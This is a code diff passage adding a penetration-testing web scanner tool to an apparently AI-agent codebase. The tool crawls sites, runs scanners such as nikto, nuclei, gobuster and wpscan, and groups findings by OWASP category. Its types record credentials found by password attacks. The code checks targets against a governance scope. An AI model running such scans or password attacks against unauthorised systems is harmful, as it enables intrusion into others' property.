+      }
+      throw err
+    }
+  }
+
+  /**
+   * Save a scan result.
+   *
+   * @param result - Scan result (id will be generated if not provided)
+   * @param config - Storage configuration
+   * @returns Saved result with ID
+   */
+  export async function saveScan(
+    result: Omit<WebScanTypes.ScanResult, "id"> | WebScanTypes.ScanResult,
+    config: StorageConfig = {}
+  ): Promise<WebScanTypes.ScanResult> {
+    const full: WebScanTypes.ScanResult = {
+      ...result,
+      id: "id" in result && result.id ? result.id : generateScanId(),
+    }
+    const validated = WebScanTypes.ScanResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = scanBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        scanBuffer[existingIdx] = validated
+      } else {
+        scanBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "webscan", "scans", validated.id], validated)
+    }
+
+    log.info("Scan result saved", {
+      id: validated.id,
+      target: validated.target,
+      profile: validated.profile,
+      findingsCount: validated.findings.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get a scan result by ID.
+   *
+   * @param id - Scan ID
+   * @param config - Storage configuration
+   * @returns Scan result or null if not found
+   */
+  export async function getScan(id: string, config: StorageConfig = {}): Promise<WebScanTypes.ScanResult | null> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<WebScanTypes.ScanResult>(["pentest", "webscan", "scans", id])
+      return WebScanTypes.ScanResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List scan results with filters.
+   *
+   * @param config - Storage configuration
+   * @param filters - Optional filters
+   * @returns Array of scan results
+   */
+  export async function listScans(
+    config: StorageConfig = {},
+    filters?: {
+      target?: string
+      profile?: WebScanTypes.ProfileId
+      status?: WebScanTypes.Status
+      limit?: number
+    }
+  ): Promise<WebScanTypes.ScanResult[]> {
+    let scans: WebScanTypes.ScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "webscan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<WebScanTypes.ScanResult>(key)
+          scans.push(WebScanTypes.ScanResult.parse(data))
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.target) {
+      scans = scans.filter((s) => s.target === filters.target)
+    }
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    scans.sort((a, b) => b.startedAt - a.startedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Delete a scan result.
+   *
+   * @param id - Scan ID
+   * @param config - Storage configuration
+   * @returns true if deleted, false if not found
+   */
+  export async function deleteScan(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = scanBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        scanBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "webscan", "scans", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Clear memory buffers (testing).
+   */
+  export function clearMemory(): void {
+    crawlBuffer.length = 0
+    scanBuffer.length = 0
+  }
+
+  /**
+   * Get memory counts (testing).
+   */
+  export function memoryCount(): { crawls: number; scans: number } {
+    return {
+      crawls: crawlBuffer.length,
+      scans: scanBuffer.length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/tool.ts b/packages/opencode/src/pentest/webscan/tool.ts
new file mode 100644
index 00000000000..250eccf0459
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/tool.ts
@@ -0,0 +1,593 @@
+/**
+ * @fileoverview Web Scanner Tool
+ *
+ * Agent tool for web crawling, scanning, and OWASP categorization.
+ *
+ * @module pentest/webscan/tool
+ */
+
+import z from "zod"
+import { Tool } from "../../tool/tool"
+import { Log } from "../../util/log"
+import { GovernanceScope } from "../../governance/scope"
+import { GovernanceMatcher } from "../../governance/matcher"
+import { WebScanTypes } from "./types"
+import { WebCrawler } from "./crawler"
+import { ScanOrchestrator } from "./orchestrator"
+import { ScanProfiles } from "./profiles"
+import { WebScanStorage } from "./storage"
+import { OwaspCategorization } from "./owasp"
+import { Session } from "../../session"
+
+const log = Log.create({ service: "webscan.tool" })
+
+/**
+ * Web Scanner Tool for penetration testing.
+ *
+ * Provides web crawling, security scanning, and OWASP categorization.
+ */
+export const WebScanTool = Tool.define("webscan", async () => {
+  return {
+    description: `Web application scanning with crawling, vulnerability detection, and OWASP categorization.
+
+ACTIONS:
+- crawl: Crawl a target URL to discover pages and forms
+- scan: Run a security scan with a specific profile
+- quick-scan: Quick scan (alias for scan with quick profile)
+- full-scan: Thorough scan (alias for scan with thorough profile)
+- urls: List discovered URLs from a crawl
+- forms: List discovered forms from a crawl
+- status: Get status of a crawl or scan
+- owasp: Categorize findings by OWASP Top 10 2021
+- profiles: List available scan profiles
+
+PROFILES:
+- quick: Fast assessment (whatweb, nikto)
+- standard: Balanced scan (whatweb, nikto, gobuster, nuclei)
+- thorough: Comprehensive (all tools)
+- passive: Recon only (whatweb, wafw00f)
+
+EXAMPLES:
+- Crawl: action="crawl", target="http://example.com", maxDepth=2
+- Quick scan: action="quick-scan", target="http://example.com"
+- Full scan: action="full-scan", target="http://example.com"
+- Custom scan: action="scan", target="http://example.com", profile="standard"
+- OWASP report: action="owasp", scanID="scan_abc123"`,
+
+    parameters: z.object({
+      action: z
+        .enum(["crawl", "scan", "quick-scan", "full-scan", "urls", "forms", "status", "owasp", "profiles"])
+        .describe("Action to perform"),
+
+      // Target
+      target: z.string().optional().describe("Target URL (http:// or https://)"),
+
+      // Crawl options
+      maxDepth: z.number().optional().describe("Maximum crawl depth. Default: 2"),
+      maxUrls: z.number().optional().describe("Maximum URLs to crawl. Default: 200"),
+      delay: z.number().optional().describe("Delay between requests in ms. Default: 100"),
+
+      // Scan options
+      profile: z.enum(["quick", "standard", "thorough", "passive", "custom"]).optional().describe("Scan profile"),
+      tools: z.array(z.string()).optional().describe("Custom list of tools to run (for custom profile)"),
+
+      // Query options
+      crawlID: z.string().optional().describe("Crawl ID for urls/forms/status actions"),
+      scanID: z.string().optional().describe("Scan ID for status/owasp actions"),
+      limit: z.number().optional().describe("Maximum results to return. Default: 50"),
+
+      // Timeout
+      timeout: z.number().optional().describe("Timeout per tool in milliseconds"),
+    }),
+
+    async execute(params, ctx) {
+      switch (params.action) {
+        case "crawl":
+          return handleCrawl(params, ctx)
+
+        case "scan":
+          return handleScan(params, ctx, params.profile || "standard")
+
+        case "quick-scan":
+          return handleScan(params, ctx, "quick")
+
+        case "full-scan":
+          return handleScan(params, ctx, "thorough")
+
+        case "urls":
+          return handleUrls(params)
+
+        case "forms":
+          return handleForms(params)
+
+        case "status":
+          return handleStatus(params)
+
+        case "owasp":
+          return handleOwasp(params)
+
+        case "profiles":
+          return handleProfiles()
+
+        default:
+          return {
+            title: `Unknown action: ${params.action}`,
+            output: `Supported actions: crawl, scan, quick-scan, full-scan, urls, forms, status, owasp, profiles`,
+            metadata: { action: params.action, status: "error" },
+          }
+      }
+    },
+  }
+})
+
+/**
+ * Handle crawl action.
+ */
+async function handleCrawl(
+  params: {
+    target?: string
+    maxDepth?: number
+    maxUrls?: number
+    delay?: number
+    timeout?: number
+  },
+  ctx: Tool.Context
+): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.target) {
+    return {
+      title: "Crawl requires target",
+      output: "Please provide a target URL (e.g., http://example.com).",
+      metadata: { action: "crawl", status: "error" },
+    }
+  }
+
+  // Validate target URL
+  let targetUrl: URL
+  try {
+    targetUrl = new URL(params.target)
+    if (!["http:", "https:"].includes(targetUrl.protocol)) {
+      throw new Error("Invalid protocol")
+    }
+  } catch {
+    return {
+      title: "Invalid target URL",
+      output: "Please provide a valid HTTP/HTTPS URL.",
+      metadata: { action: "crawl", status: "error" },
+    }
+  }
+
+  // Validate against governance scope
+  const targets = GovernanceMatcher.extractTargets("webscan", { target: params.target })
+  const scopeCheck = GovernanceScope.check(targets, undefined)
+  if (!scopeCheck.allowed) {
+    return {
+      title: "Target out of scope",
+      output: `Governance scope violation: ${scopeCheck.reason}`,
+      metadata: { action: "crawl", target: params.target, status: "scope_violation" },
+    }
+  }
+
+  // Request permission for network access
+  await ctx.ask({
+    permission: "bash",
+    patterns: [`curl *`, `wget *`],
+    always: [`curl *`, `wget *`],
+    metadata: { action: "crawl", target: params.target },
+  })
+
+  ctx.metadata({
+    title: `Crawling ${params.target}`,
+    metadata: { action: "crawl", target: params.target, status: "running" },
+  })
+
+  try {
+    const result = await WebCrawler.crawl(params.target, {
+      maxDepth: params.maxDepth,
+      maxUrls: params.maxUrls,
+      delay: params.delay,
+      timeout: params.timeout,
+    })
+
+    // Save result
+    await WebScanStorage.saveCrawl(result)
+
+    // Format output
+    const lines: string[] = []
+    lines.push(`Crawl completed: ${params.target}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Crawl ID: ${result.id}`)
+    lines.push(`URLs discovered: ${result.stats.urlsDiscovered}`)
+    lines.push(`Forms discovered: ${result.stats.formsDiscovered}`)
+    lines.push(`Max depth reached: ${result.stats.maxDepthReached}`)
+    lines.push(`Duration: ${(result.stats.duration / 1000).toFixed(1)}s`)
+    lines.push(`Status: ${result.status}`)
+
+    if (result.urls.length > 0) {
+      lines.push("")
+      lines.push("Sample URLs:")
+      for (const url of result.urls.slice(0, 10)) {
+        lines.push(`  [${url.statusCode || "?"}] ${url.url}`)
+      }
+      if (result.urls.length > 10) {
+        lines.push(`  ... and ${result.urls.length - 10} more`)
+      }
+    }
+
+    if (result.forms.length > 0) {
+      lines.push("")
+      lines.push("Forms found:")
+      for (const form of result.forms.slice(0, 5)) {
+        const flags = [form.hasPassword && "password", form.hasFileUpload && "file"].filter(Boolean).join(", ")
+        lines.push(`  ${form.method} ${form.action}${flags ? ` [${flags}]` : ""}`)
+      }
+      if (result.forms.length > 5) {
+        lines.push(`  ... and ${result.forms.length - 5} more`)
+      }
+    }
+
+    return {
+      title: `Crawled ${result.stats.urlsDiscovered} URLs`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "crawl",
+        crawlID: result.id,
+        target: params.target,
+        urlsDiscovered: result.stats.urlsDiscovered,
+        formsDiscovered: result.stats.formsDiscovered,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Crawl failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "crawl", target: params.target, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle scan action.
+ */
+async function handleScan(
+  params: {
+    target?: string
+    profile?: string
+    tools?: string[]
+    timeout?: number
+  },
+  ctx: Tool.Context,
+  profileId: WebScanTypes.ProfileId
+): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.target) {
+    return {
+      title: "Scan requires target",
+      output: "Please provide a target URL (e.g., http://example.com).",
+      metadata: { action: "scan", status: "error" },
+    }
+  }
+
+  // Validate target URL
+  let targetUrl: URL
+  try {
+    targetUrl = new URL(params.target)
+    if (!["http:", "https:"].includes(targetUrl.protocol)) {
+      throw new Error("Invalid protocol")
+    }
+  } catch {
+    return {
+      title: "Invalid target URL",
+      output: "Please provide a valid HTTP/HTTPS URL.",
+      metadata: { action: "scan", status: "error" },
+    }
+  }
+
+  // Validate against governance scope
+  const targets = GovernanceMatcher.extractTargets("webscan", { target: params.target })
+  const scopeCheck = GovernanceScope.check(targets, undefined)
+  if (!scopeCheck.allowed) {
+    return {
+      title: "Target out of scope",
+      output: `Governance scope violation: ${scopeCheck.reason}`,
+      metadata: { action: "scan", target: params.target, status: "scope_violation" },
+    }
+  }
+
+  const profile = ScanProfiles.get(profileId)
+
+  // Request permission for security scanning
+  await ctx.ask({
+    permission: "bash",
+    patterns: [
+      `whatweb *`,
+      `nikto *`,
+      `gobuster *`,
+      `ffuf *`,
+      `nuclei *`,
+      `wpscan *`,
+      `wafw00f *`,
+    ],
+    always: [`whatweb *`, `nikto *`],
+    metadata: {
+      action: "scan",
+      target: params.target,
+      profile: profileId,
+      tools: params.tools || profile.tools,
+    },
+  })
+
+  ctx.metadata({
+    title: `Scanning ${params.target} with ${profileId} profile`,
+    metadata: { action: "scan", target: params.target, profile: profileId, status: "running" },
+  })
+
+  try {
+    // Get current session ID
+    const sessionID = ctx.sessionID
+
+    const result = await ScanOrchestrator.scan(params.target, profile, {
+      sessionID,
+      timeout: params.timeout,
+      customTools: params.tools,
+    })
+
+    return {
+      title: `Scan complete: ${result.stats.findingsCount} finding(s)`,
+      output: ScanOrchestrator.format(result),
+      metadata: {
+        action: "scan",
+        scanID: result.id,
+        target: params.target,
+        profile: profileId,
+        findingsCount: result.stats.findingsCount,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "Scan failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "scan", target: params.target, profile: profileId, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle urls action.
+ */
+async function handleUrls(params: {
+  crawlID?: string
+  limit?: number
+}): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.crawlID) {
+    return {
+      title: "URLs requires crawlID",
+      output: "Please provide a crawl ID.",
+      metadata: { action: "urls", status: "error" },
+    }
+  }
+
+  const crawl = await WebScanStorage.getCrawl(params.crawlID)
+  if (!crawl) {
+    return {
+      title: "Crawl not found",
+      output: `No crawl with ID: ${params.crawlID}`,
+      metadata: { action: "urls", crawlID: params.crawlID, status: "error" },
+    }
+  }
+
+  const limit = params.limit || 50
+  const urls = crawl.urls.slice(0, limit)
+
+  const lines: string[] = []
+  lines.push(`URLs from crawl: ${params.crawlID}`)
+  lines.push(`Target: ${crawl.target}`)
+  lines.push(`Total: ${crawl.urls.length}`)
+  lines.push("=".repeat(50))
+
+  for (const url of urls) {
+    lines.push(`[${url.statusCode || "?"}] ${url.url} (depth: ${url.depth})`)
+  }
+
+  if (crawl.urls.length > limit) {
+    lines.push(`... and ${crawl.urls.length - limit} more`)
+  }
+
+  return {
+    title: `${crawl.urls.length} URL(s) from crawl`,
+    output: lines.join("\n"),
+    metadata: { action: "urls", crawlID: params.crawlID, count: crawl.urls.length, status: "completed" },
+  }
+}
+
+/**
+ * Handle forms action.
+ */
+async function handleForms(params: {
+  crawlID?: string
+  limit?: number
+}): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.crawlID) {
+    return {
+      title: "Forms requires crawlID",
+      output: "Please provide a crawl ID.",
+      metadata: { action: "forms", status: "error" },
+    }
+  }
+
+  const crawl = await WebScanStorage.getCrawl(params.crawlID)
+  if (!crawl) {
+    return {
+      title: "Crawl not found",
+      output: `No crawl with ID: ${params.crawlID}`,
+      metadata: { action: "forms", crawlID: params.crawlID, status: "error" },
+    }
+  }
+
+  const limit = params.limit || 50
+  const forms = crawl.forms.slice(0, limit)
+
+  const lines: string[] = []
+  lines.push(`Forms from crawl: ${params.crawlID}`)
+  lines.push(`Target: ${crawl.target}`)
+  lines.push(`Total: ${crawl.forms.length}`)
+  lines.push("=".repeat(50))
+
+  for (const form of forms) {
+    const flags = []
+    if (form.hasPassword) flags.push("password")
+    if (form.hasFileUpload) flags.push("file-upload")
+
+    lines.push("")
+    lines.push(`${form.method} ${form.action}`)
+    lines.push(`  Page: ${form.url}`)
+    lines.push(`  Inputs: ${form.inputs.map((i) => `${i.name}(${i.type})`).join(", ")}`)
+    if (flags.length > 0) {
+      lines.push(`  Flags: ${flags.join(", ")}`)
+    }
+  }
+
+  if (crawl.forms.length > limit) {
+    lines.push(`... and ${crawl.forms.length - limit} more`)
+  }
+
+  return {
+    title: `${crawl.forms.length} form(s) from crawl`,
+    output: lines.join("\n"),
+    metadata: { action: "forms", crawlID: params.crawlID, count: crawl.forms.length, status: "completed" },
+  }
+}
+
+/**
+ * Handle status action.
+ */
+async function handleStatus(params: {
+  crawlID?: string
+  scanID?: string
+}): Promise<{ title: string; output: string; metadata: any }> {
+  if (params.scanID) {
+    const scan = await WebScanStorage.getScan(params.scanID)
+    if (!scan) {
+      return {
+        title: "Scan not found",
+        output: `No scan with ID: ${params.scanID}`,
+        metadata: { action: "status", scanID: params.scanID, status: "error" },
+      }
+    }
+
+    return {
+      title: `Scan status: ${scan.status}`,
+      output: ScanOrchestrator.format(scan),
+      metadata: {
+        action: "status",
+        scanID: params.scanID,
+        target: scan.target,
+        scanStatus: scan.status,
+        status: "completed",
+      },
+    }
+  }
+
+  if (params.crawlID) {
+    const crawl = await WebScanStorage.getCrawl(params.crawlID)
+    if (!crawl) {
+      return {
+        title: "Crawl not found",
+        output: `No crawl with ID: ${params.crawlID}`,
+        metadata: { action: "status", crawlID: params.crawlID, status: "error" },
+      }
+    }
+
+    const lines: string[] = []
+    lines.push(`Crawl: ${params.crawlID}`)
+    lines.push(`Target: ${crawl.target}`)
+    lines.push(`Status: ${crawl.status}`)
+    lines.push(`URLs: ${crawl.stats.urlsDiscovered}`)
+    lines.push(`Forms: ${crawl.stats.formsDiscovered}`)
+    lines.push(`Duration: ${(crawl.stats.duration / 1000).toFixed(1)}s`)
+
+    return {
+      title: `Crawl status: ${crawl.status}`,
+      output: lines.join("\n"),
+      metadata: {
+        action: "status",
+        crawlID: params.crawlID,
+        crawlStatus: crawl.status,
+        status: "completed",
+      },
+    }
+  }
+
+  return {
+    title: "Status requires crawlID or scanID",
+    output: "Please provide a crawl ID or scan ID.",
+    metadata: { action: "status", status: "error" },
+  }
+}
+
+/**
+ * Handle OWASP categorization action.
+ */
+async function handleOwasp(params: {
+  scanID?: string
+}): Promise<{ title: string; output: string; metadata: any }> {
+  if (!params.scanID) {
+    return {
+      title: "OWASP requires scanID",
+      output: "Please provide a scan ID to categorize findings.",
+      metadata: { action: "owasp", status: "error" },
+    }
+  }
+
+  const scan = await WebScanStorage.getScan(params.scanID)
+  if (!scan) {
+    return {
+      title: "Scan not found",
+      output: `No scan with ID: ${params.scanID}`,
+      metadata: { action: "owasp", scanID: params.scanID, status: "error" },
+    }
+  }
+
+  try {
+    const result = await OwaspCategorization.categorize(params.scanID)
+
+    return {
+      title: `OWASP categorization for ${result.findings.length} finding(s)`,
+      output: OwaspCategorization.format(result),
+      metadata: {
+        action: "owasp",
+        scanID: params.scanID,
+        findingsCount: result.findings.length,
+        status: "completed",
+      },
+    }
+  } catch (error) {
+    return {
+      title: "OWASP categorization failed",
+      output: `Error: ${error instanceof Error ? error.message : String(error)}`,
+      metadata: { action: "owasp", scanID: params.scanID, status: "error" },
+    }
+  }
+}
+
+/**
+ * Handle profiles action.
+ */
+function handleProfiles(): { title: string; output: string; metadata: any } {
+  const lines: string[] = []
+  lines.push("Available Scan Profiles")
+  lines.push("=".repeat(50))
+  lines.push("")
+
+  for (const profile of ScanProfiles.all) {
+    lines.push(ScanProfiles.describe(profile))
+    lines.push("")
+  }
+
+  return {
+    title: "Scan profiles",
+    output: lines.join("\n"),
+    metadata: { action: "profiles", count: ScanProfiles.all.length, status: "completed" },
+  }
+}
diff --git a/packages/opencode/src/pentest/webscan/types.ts b/packages/opencode/src/pentest/webscan/types.ts
new file mode 100644
index 00000000000..b02f2dbd2d2
--- /dev/null
+++ b/packages/opencode/src/pentest/webscan/types.ts
@@ -0,0 +1,335 @@
+/**
+ * @fileoverview Web Application Scanner Types
+ *
+ * Zod schemas for web scanning data structures including:
+ * - Crawl results (URLs and forms)
+ * - Scan profiles and results
+ * - Tool execution tracking
+ * - OWASP categorization
+ *
+ * @module pentest/webscan/types
+ */
+
+import z from "zod"
+
+export namespace WebScanTypes {
+  /**
+   * HTTP methods
+   */
+  export const HttpMethod = z.enum(["GET", "POST", "PUT", "DELETE", "PATCH", "HEAD", "OPTIONS"])
+  export type HttpMethod = z.infer<typeof HttpMethod>
+
+  /**
+   * Crawl/scan status
+   */
+  export const Status = z.enum(["pending", "running", "completed", "failed", "stopped"])
+  export type Status = z.infer<typeof Status>
+
+  /**
+   * Form input type
+   */
+  export const InputType = z.enum([
+    "text",
+    "password",
+    "email",
+    "number",
+    "hidden",
+    "submit",
+    "checkbox",
+    "radio",
+    "file",
+    "textarea",
+    "select",
+    "other",
+  ])
+  export type InputType = z.infer<typeof InputType>
+
+  /**
+   * Form input field
+   */
+  export const FormInput = z.object({
+    name: z.string(),
+    type: InputType,
+    value: z.string().optional(),
+    required: z.boolean().optional(),
+  })
+  export type FormInput = z.infer<typeof FormInput>
+
+  /**
+   * Discovered URL from crawling
+   */
+  export const DiscoveredUrl = z.object({
+    url: z.string(),
+    method: HttpMethod.default("GET"),
+    statusCode: z.number().optional(),
+    contentType: z.string().optional(),
+    contentLength: z.number().optional(),
+    depth: z.number(),
+    parent: z.string().optional(),
+    discoveredAt: z.number(),
+  })
+  export type DiscoveredUrl = z.infer<typeof DiscoveredUrl>
+
+  /**
+   * Discovered form from crawling
+   */
+  export const DiscoveredForm = z.object({
+    id: z.string(),
+    url: z.string(),
+    action: z.string(),
+    method: HttpMethod.default("GET"),
+    inputs: z.array(FormInput),
+    hasFileUpload: z.boolean(),
+    hasPassword: z.boolean(),
+    discoveredAt: z.number(),
+  })
+  export type DiscoveredForm = z.infer<typeof DiscoveredForm>
+
+  /**
+   * Crawl statistics
+   */
+  export const CrawlStats = z.object({
+    urlsDiscovered: z.number(),
+    urlsVisited: z.number(),
+    formsDiscovered: z.number(),
+    maxDepthReached: z.number(),
+    errorCount: z.number(),
+    duration: z.number(),
+  })
+  export type CrawlStats = z.infer<typeof CrawlStats>
+
+  /**
+   * Crawl options
+   */
+  export const CrawlOptions = z.object({
+    maxDepth: z.number().default(2),
+    maxUrls: z.number().default(200),
+    timeout: z.number().default(30000),
+    delay: z.number().default(100),
+    followRedirects: z.boolean().default(true),
+    respectRobotsTxt: z.boolean().default(true),
+    includePatterns: z.array(z.string()).optional(),
+    excludePatterns: z.array(z.string()).optional(),
+    userAgent: z.string().optional(),
+  })
+  export type CrawlOptions = z.infer<typeof CrawlOptions>
+
+  /**
+   * Crawl result
+   */
+  export const CrawlResult = z.object({
+    id: z.string(),
+    target: z.string(),
+    urls: z.array(DiscoveredUrl),
+    forms: z.array(DiscoveredForm),
+    stats: CrawlStats,
+    options: CrawlOptions,
+    startedAt: z.number(),
+    completedAt: z.number().optional(),
+    status: Status,
+    error: z.string().optional(),
+  })
+  export type CrawlResult = z.infer<typeof CrawlResult>
+
+  /**
+   * Scan profile ID
+   */
+  export const ProfileId = z.enum(["quick", "standard", "thorough", "passive", "custom"])
+  export type ProfileId = z.infer<typeof ProfileId>
+
+  /**
+   * Scan profile crawl configuration
+   */
+  export const ProfileCrawlConfig = z.object({
+    enabled: z.boolean(),
+    maxDepth: z.number(),
+    maxUrls: z.number(),
+  })
+  export type ProfileCrawlConfig = z.infer<typeof ProfileCrawlConfig>
+
+  /**
+   * Scan profile definition
+   */
+  export const ScanProfile = z.object({
+    id: ProfileId,
+    name: z.string(),
+    description: z.string(),
+    crawl: ProfileCrawlConfig,
+    tools: z.array(z.string()),
+    toolOptions: z.record(z.string(), z.array(z.string())).optional(),
+  })
+  export type ScanProfile = z.infer<typeof ScanProfile>
+
+  /**
+   * Tool execution status
+   */
+  export const ToolExecutionStatus = z.enum(["pending", "running", "completed", "failed", "skipped"])
+  export type ToolExecutionStatus = z.infer<typeof ToolExecutionStatus>
+
+  /**
+   * Tool execution record
+   */
+  export const ToolExecution = z.object({
+    tool: z.string(),
+    status: ToolExecutionStatus,
+    startedAt: z.number().optional(),
+    completedAt: z.number().optional(),
+    duration: z.number().optional(),
+    findingsCount: z.number().optional(),
+    error: z.string().optional(),
+    output: z.string().optional(),
+  })
+  export type ToolExecution = z.infer<typeof ToolExecution>
+
+  /**
+   * Scan statistics
+   */
+  export const ScanStats = z.object({
+    urlsScanned: z.number(),
+    toolsRun: z.number(),
+    toolsFailed: z.number(),
+    findingsCount: z.number(),
+    criticalCount: z.number(),
+    highCount: z.number(),
+    mediumCount: z.number(),
+    lowCount: z.number(),
+    infoCount: z.number(),
+    duration: z.number(),
+  })
+  export type ScanStats = z.infer<typeof ScanStats>
+
+  /**
+   * Scan result
+   */
+  export const ScanResult = z.object({
+    id: z.string(),
+    target: z.string(),
+    profile: ProfileId,
+    crawlID: z.string().optional(),
+    tools: z.array(ToolExecution),
+    findings: z.array(z.string()),
+    stats: ScanStats,
+    startedAt: z.number(),
+    completedAt: z.number().optional(),
+    status: Status,
+    error: z.string().optional(),
+  })
+  export type ScanResult = z.infer<typeof ScanResult>
+
+  /**
+   * OWASP Top 10 2021 categories
+   */
+  export const OwaspCategory = z.enum([
+    "A01:2021-Broken_Access_Control",
+    "A02:2021-Cryptographic_Failures",
+    "A03:2021-Injection",
+    "A04:2021-Insecure_Design",
+    "A05:2021-Security_Misconfiguration",
+    "A06:2021-Vulnerable_and_Outdated_Components",
+    "A07:2021-Identification_and_Authentication_Failures",
+    "A08:2021-Software_and_Data_Integrity_Failures",
+    "A09:2021-Security_Logging_and_Monitoring_Failures",
+    "A10:2021-Server-Side_Request_Forgery",
+    "Uncategorized",
+  ])
+  export type OwaspCategory = z.infer<typeof OwaspCategory>
+
+  /**
+   * Finding with OWASP categorization
+   */
+  export const CategorizedFinding = z.object({
+    findingID: z.string(),
+    category: OwaspCategory,
+    confidence: z.enum(["high", "medium", "low"]),
+    matchedPatterns: z.array(z.string()),
+  })
+  export type CategorizedFinding = z.infer<typeof CategorizedFinding>
+
+  /**
+   * OWASP categorization result
+   */
+  export const OwaspCategorization = z.object({
+    scanID: z.string(),
+    findings: z.array(CategorizedFinding),
+    summary: z.record(OwaspCategory, z.number()),
+    generatedAt: z.number(),
+  })
+  export type OwaspCategorization = z.infer<typeof OwaspCategorization>
+
+  /**
+   * WPScan vulnerability entry
+   */
+  export const WPScanVulnerability = z.object({
+    title: z.string(),
+    fixedIn: z.string().optional(),
+    references: z.record(z.string(), z.array(z.string())).optional(),
+    cvss: z
+      .object({
+        score: z.string().optional(),
+        vector: z.string().optional(),
+      })
+      .optional(),
+  })
+  export type WPScanVulnerability = z.infer<typeof WPScanVulnerability>
+
+  /**
+   * WPScan result
+   */
+  export const WPScanResult = z.object({
+    target: z.string(),
+    version: z
+      .object({
+        number: z.string().optional(),
+        status: z.string().optional(),
+        vulnerabilities: z.array(WPScanVulnerability).optional(),
+      })
+      .optional(),
+    mainTheme: z
+      .object({
+        name: z.string().optional(),
+        version: z.string().optional(),
+        vulnerabilities: z.array(WPScanVulnerability).optional(),
+      })
+      .optional(),
+    plugins: z
+      .record(
+        z.string(),
+        z.object({
+          version: z.string().optional(),
+          vulnerabilities: z.array(WPScanVulnerability).optional(),
+        })
+      )
+      .optional(),
+    users: z.array(z.string()).optional(),
+    passwordAttack: z
+      .object({
+        found: z.array(z.object({ username: z.string(), password: z.string() })).optional(),
+      })
+      .optional(),
+    timestamp: z.number(),
+  })
+  export type WPScanResult = z.infer<typeof WPScanResult>
+
+  /**
+   * WhatWeb technology entry
+   */
+  export const WhatWebTechnology = z.object({
+    name: z.string(),
+    version: z.string().optional(),
+    string: z.array(z.string()).optional(),
+    module: z.string().optional(),
+  })
+  export type WhatWebTechnology = z.infer<typeof WhatWebTechnology>
+
+  /**
+   * WhatWeb result
+   */
+  export const WhatWebResult = z.object({
+    target: z.string(),
+    httpStatus: z.number().optional(),
+    technologies: z.array(WhatWebTechnology),
+    headers: z.record(z.string(), z.string()).optional(),
+    timestamp: z.number(),
+  })
+  export type WhatWebResult = z.infer<typeof WhatWebResult>
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/bluetooth/ble.ts b/packages/opencode/src/pentest/wirelessscan/bluetooth/ble.ts
new file mode 100644
index 00000000000..ffa36c3f9a6
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/bluetooth/ble.ts
@@ -0,0 +1,401 @@
+/**
+ * @fileoverview Bluetooth Low Energy Analysis
+ *
+ * BLE service and characteristic enumeration and security analysis.
+ *
+ * @module pentest/wirelessscan/bluetooth/ble
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+
+/**
+ * BLE analysis namespace.
+ */
+export namespace BluetoothBLE {
+  // ========== Standard UUIDs ==========
+
+  /**
+   * Standard BLE service UUIDs.
+   */
+  export const STANDARD_SERVICES: Record<string, string> = {
+    "00001800-0000-1000-8000-00805f9b34fb": "Generic Access",
+    "00001801-0000-1000-8000-00805f9b34fb": "Generic Attribute",
+    "00001802-0000-1000-8000-00805f9b34fb": "Immediate Alert",
+    "00001803-0000-1000-8000-00805f9b34fb": "Link Loss",
+    "00001804-0000-1000-8000-00805f9b34fb": "Tx Power",
+    "00001805-0000-1000-8000-00805f9b34fb": "Current Time Service",
+    "00001806-0000-1000-8000-00805f9b34fb": "Reference Time Update",
+    "00001807-0000-1000-8000-00805f9b34fb": "Next DST Change",
+    "00001808-0000-1000-8000-00805f9b34fb": "Glucose",
+    "00001809-0000-1000-8000-00805f9b34fb": "Health Thermometer",
+    "0000180a-0000-1000-8000-00805f9b34fb": "Device Information",
+    "0000180d-0000-1000-8000-00805f9b34fb": "Heart Rate",
+    "0000180e-0000-1000-8000-00805f9b34fb": "Phone Alert Status",
+    "0000180f-0000-1000-8000-00805f9b34fb": "Battery Service",
+    "00001810-0000-1000-8000-00805f9b34fb": "Blood Pressure",
